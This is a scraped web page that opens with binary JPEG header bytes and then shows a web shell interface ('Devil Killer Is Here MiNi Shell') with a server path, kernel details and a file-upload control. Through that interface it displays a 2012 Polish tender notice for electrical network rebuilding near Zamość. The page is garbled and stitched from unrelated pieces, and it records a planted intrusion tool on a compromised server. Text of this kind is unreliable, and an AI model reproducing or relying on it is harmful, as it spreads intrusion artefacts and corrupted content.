JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/102920-N-2012.html

<p class="kh_header"><b>Zamość: 3.1.	Przedmiotem zamówienia, objętym niniejszym postępowaniem są roboty budowlane branży elektroenergetycznej - przebudowa sieci elektroenergetycznej ŚN i nn łącznie z oświetleniem ulicznym oraz stacji transformatorowej w m-ci Susiec - Skwarki - etap II.</b><br>
<b>Numer ogłoszenia: 102920 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGE Dystrybucja Spółka Akcyjna ul. Garbarska 21A, 20-340 Lublin, Oddział Zamość , ul. Koźmiana 1, 22-400 Zamość, woj. lubelskie, tel. 84 539 21 00, faks 084 539 21 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pgedystrybucja.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zamosc.pgedystrybucja.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor elektroenergetyczny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 3.1.	Przedmiotem zamówienia, objętym niniejszym postępowaniem są roboty budowlane branży elektroenergetycznej - przebudowa sieci elektroenergetycznej ŚN i nn łącznie z oświetleniem ulicznym oraz stacji transformatorowej w m-ci Susiec - Skwarki - etap II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.3.	Zakres robót obejmuje: 
3.3.1.	Demontaż linii napowietrznej ŚN-15kV Susiec Skwarki 2.
3.3.2.	Demontaż stacji transformatorowych typu ŻH-15B Susiec Skwarki 2 - 1szt.
3.3.3.	Budowę stacji transformatorowych typu STSR 20/400 Susiec Skwarki 2 - 1szt.
3.3.4.	Budowa odg. ŚN 15kV napowietrznego typu 3xAFL 6-35mm2 Susiec Skwarki 2 - 12mb.
3.3.5.	Przebudowę linii nN nieizolowanej na kablową typu YAKY zasil. ze stacji transformatorowych Susiec Skwarki 2 i Susiec GS.
3.3.6.	Przebudowę istniejących przyłączy nN napowietrznych na kablowe typu YAKY zasil. ze stacji transformatorowych Susiec Skwarki 2 i Susiec GS.
3.3.7.	Przebudowę oświetlenia ulicznego na wydzielone w zakresie: 
	ułożenia kabli typu YAKY 4x25mm2 ze stacji transformatorowej 15/0,4kV Susiec Skwarki 2 - 1121mb,
	montażu fundamentów słupów typu F-150/200 - 25szt.,
	ustawienia słupów S-100/8 - 25szt.,
	montażu opraw oświetleniowych Schreder IPSO 100 - 25szt. wraz 
z lampami oraz szafy oświetleniowej typu SO-1C+P - 1szt. - Gmina Susiec.
3.4.	Szczegółowy zakres robót zawiera dokumentacja projektowa stanowiąca załączniki 
nr 9: a) i b) do niniejszej SIWZ oraz przedmiar robót stanowiący załącznik nr 8. 
3.5.	Zakres zamówienia obejmuje również:
3.5.1.	Zorganizowanie i zabezpieczenie placu budowy,
3.5.2.	Przedłożenie wymaganych prawem świadectw bezpieczeństwa, certyfikatów i atestów na wbudowane materiały i urządzenia,
3.5.3.	Wykonanie wytyczenia geodezyjnego i powykonawczej inwentaryzacji geodezyjnej,
3.5.4.	Koszty pomiarów, badań, nadzorów, odbiorów z wyłączeniem odbiorów nadzorów, wykonywanych przez Zamawiającego,
3.5.5.	Wypłatę odszkodowań za zniszczenia spowodowane przez Wykonawcę w trakcie wykonywania robót na posesjach właścicieli działek, na których będą wykonywane roboty,
3.5.6.	Koszty transportu dostaw inwestorskich na plac budowy,*
3.5.7.	Dostarczenie materiałów z demontażu do magazynu Zamawiającego lub w miejsce przez niego wskazane,*
3.5.8.	Opracowanie projektu zajęcia pasa drogowego, wystąpienie o zajęcie pasa drogowego, wykonanie robót i oznakowania wynikające z zabezpieczenia pasa drogowego, opłaty za zajęcie pasa drogowego,
3.5.9.	Wycinkę drzew i gałęzi,
3.5.10.	Naprawę lub koszty naprawy uszkodzonych przez Wykonawcę w trakcie
wykonywania robót, dróg, chodników, ogrodzeń, mostków, urządzeń
melioracyjnych itp.,
3.5.11.	Koszty wymaganych nadzorów specjalistycznych (konserwatorskich, archeologicznych, dendrologicznych itp.),
3.5.12.	Koszty związane z zajęciem terenu PKP,
3.5.13.	Inne czynności i koszty ich realizacji nie wymienione w ppkt. od 3.5.1. do 3.5.12. powyżej ale konieczne do wykonania przedmiotu zamówienia zgodnie 
z wiedzą i sztuką budowlaną, przepisami prawa oraz niniejszą SIWZ.
3.6.	Zakres całości prac wynika z opisu przedmiotu zamówienia przedstawionego w pkt 3.1, 3.2, 3.3, 3.4, 3.5 niniejszej SIWZ oraz zapoznania się Wykonawcy z warunkami terenowymi, układem sieci, warunkami wyłączeń, odtworzenia terenu (dróg, chodników, zieleni itp.) w miejscu wykonania robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.23.20.00-2, 45.23.22.00-4, 45.23.22.20-0, 45.31.43.00-4, 45.31.43.10-7, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1.	Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium 
w wysokości 20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100).
12.2.	Wadium może być wnoszone w jednej lub kilku następujących formach określonych
w art. 45 ust 6 Pzp tj. w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007  r Nr 42, poz.275 z późn. zm.)
12.3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Oddziału Zamość 
Pekao S.A. 46 1240 2816 1111 0010 1245 2090. 
12.4.	Wadium wnoszone w innej formie niż pieniądz należy złożyć w formie oryginału 
u Kierownika Wydziału Zamówień PGE Dystrybucja SA Oddział Zamość, Zamość ul. Koźmiana 1, pokój nr 311, od poniedziałku do piątku - z wyjątkiem świąt, w godzinach od 8:00 do 14:00 lub dołączyć do oferty.
12.5.	Wadium musi być wniesione najpóźniej  do wyznaczonego terminu składania ofert tj. do dnia 16.04.2012 r. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się ono na rachunku bankowym Zamawiającego, 
o skuteczności nie decyduje data na poleceniu przelewu. Wadium w formie gwarancji lub poręczenia powinno zawierać zobowiązanie gwaranta o płatności nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie.
12.6.	Zwrot wadium nastąpi na zasadach określonych w art. 46 Pzp.
12.7.	Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
a)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
b)	Wykonawca, którego oferta została wybrana:
	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy. 
12.8.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>8.2.1.	Posiadają wiedzę i doświadczenie do wykonania zamówienia tj. Wykażą się należytym wykonaniem, w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na wykonaniu co najmniej 1 roboty budowlanej (tj. 1 inwestycji) o wartości brutto co najmniej 500 000 zł, polegającej na budowie lub przebudowie sieci elektroenergetycznej SN i nn napowietrznej i kablowej, w tym stacji transformatorowej 15/0,4 kV z podaniem jej wartości, daty wykonania oraz Zamawiającego. 
Do wykazu należy dołączyć dokumenty potwierdzające, że roboty zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
8.9.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
dokumenty:
9.2.	Wykaz robót potwierdzający: należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na wykonaniu co najmniej:
1 roboty budowlanej (tj. 1 inwestycji) o wartości brutto co najmniej 500 000 zł, polegających na budowie lub przebudowie sieci elektroenergetycznej SN i nn napowietrznej 
i kablowej w tym stacji transformatorowej 15/0,4 kV z podaniem ich wartości , dat wykonania oraz Zamawiających. Wykaz należy sporządzić zgodnie ze wzorem Załącznik nr 5. 
Do wykazu należy dołączyć dokumenty potwierdzające, że roboty zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>8.2.2.	Dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. 
a)	wykażą się co najmniej jedną osobą, którą dysponuje lub będzie dysponował Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia jako kierownik budowy, z co najmniej 5 letnim doświadczeniem zawodowym (liczonym od daty uzyskania uprawnień budowlanych), posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie 
w specjalności sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych i przynależnością do Okręgowej Izby Inżynierów Budownictwa oraz posiadającą ważne świadectwo kwalifikacyjne
D i E powyżej 1 kV .
b)	wykażą się co najmniej 2 osobami którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia (oprócz kierownika budowy) i posiadają ważne świadectwa kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych powyżej 1 kV na stanowisku eksploatacji (grupa E), 
w tym jedna z tych osób posiada dodatkowe uprawnienia do wykonywania pomiarów.

1.1.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
dokumenty:
9.3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, potwierdzający: 
a) wykazanie się co najmniej jedną osobą, którą dysponuje lub będzie dysponował Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia jako kierownik budowy, z co najmniej 5 letnim doświadczeniem zawodowym (liczonym od daty uzyskania uprawnień budowlanych), posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności sieci, instalacji 
i urządzeń elektrycznych i elektroenergetycznych, i przynależnością do Okręgowej Izby Inżynierów Budownictwa oraz posiadającą ważne świadectwo kwalifikacyjne 
D i E powyżej 1 kV, 
b) wykazanie się co najmniej 2 osobami, którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia (oprócz kierownika budowy) i posiadają ważne świadectwa kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych powyżej 1 kV na stanowisku eksploatacji (grupa E), w tym jedna z tych osób posiada dodatkowe uprawnienia do wykonywania pomiarów. Wykaz należy sporządzić zgodnie ze wzorem Załącznika nr 6. 
Do Wykazu należy załączyć informację o podstawie do dysponowania wskazaną osobą /osobami,
c) do wykazu należy dołączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia - wg Załącznika nr 7 do SIWZ .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.1.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Za spełnienie warunku Zamawiający uzna posiadanie ważnego i opłaconego ubezpieczenia  odpowiedzialności cywilnej w zakresie 	prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co 	najmniej 500 000 zł (pięćset tysięcy złotych).
1.2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
dokumenty:
9.4.	Opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 500 000 zł (pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>9.7.1.	Formularz ofertowy z wykorzystaniem wzoru - Załącznik nr 1. W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną.
9.7.2.	Dokument potwierdzający wniesienie wadium.
9.7.3.	Pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy 
w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować  wszystkich Wykonawców  ubiegających się  wspólnie o udzielenie  zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie.
9.7.4.	Pełnomocnictwo do występowania w imieniu Wykonawcy w przypadku, gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego rejestru Sadowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej) - w formie oryginału lub kopii poświadczonej notarialnie.
9.7.5.	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim  stosunków.
9.7.6.	Kosztorys ofertowy szczegółowy sporządzony na podstawie przedmiaru robót stanowiącego zał. nr 8 do SIWZ. Wymagane jest, aby kosztorys ofertowy był sporządzony metodą szczegółową z wyliczeniem wartości z narzutami każdej pozycji objętej przedmiarem robót z podziałem na elementy jak w przedmiarze robót. Kosztorys musi mieć dołączoną tabelę elementów scalonych, oraz zestawienie materiałów (z cenami jednostkowymi), sprzętu i robocizny.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>22.	Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego
22.1.	Istotne postanowienia umowy zawarte zostały w Załącznikach Nr 2 i Nr 2A do SIWZ.
22.2.	Klauzule ewentualnych zmian umowy przewidziane w trybie art. 144 ustawy Pzp, które mogą zostać wprowadzone po zaistnieniu  następujących okoliczności:
22.2.1.	przewidziane w SIWZ zmiany umowy mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,
22.2.2.	zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ,
22.2.3.	warunkiem dokonania zmian, o których mowa, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmiany, uzasadnienie zmiany oraz opis wpływu zmiany na termin wykonania umowy,
22.2.4.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
22.2.5.	zmiana umowy (w szczególności terminu wykonania) może nastąpić w przypadku wystąpienia: wyjątkowo niesprzyjających warunków klimatycznych 
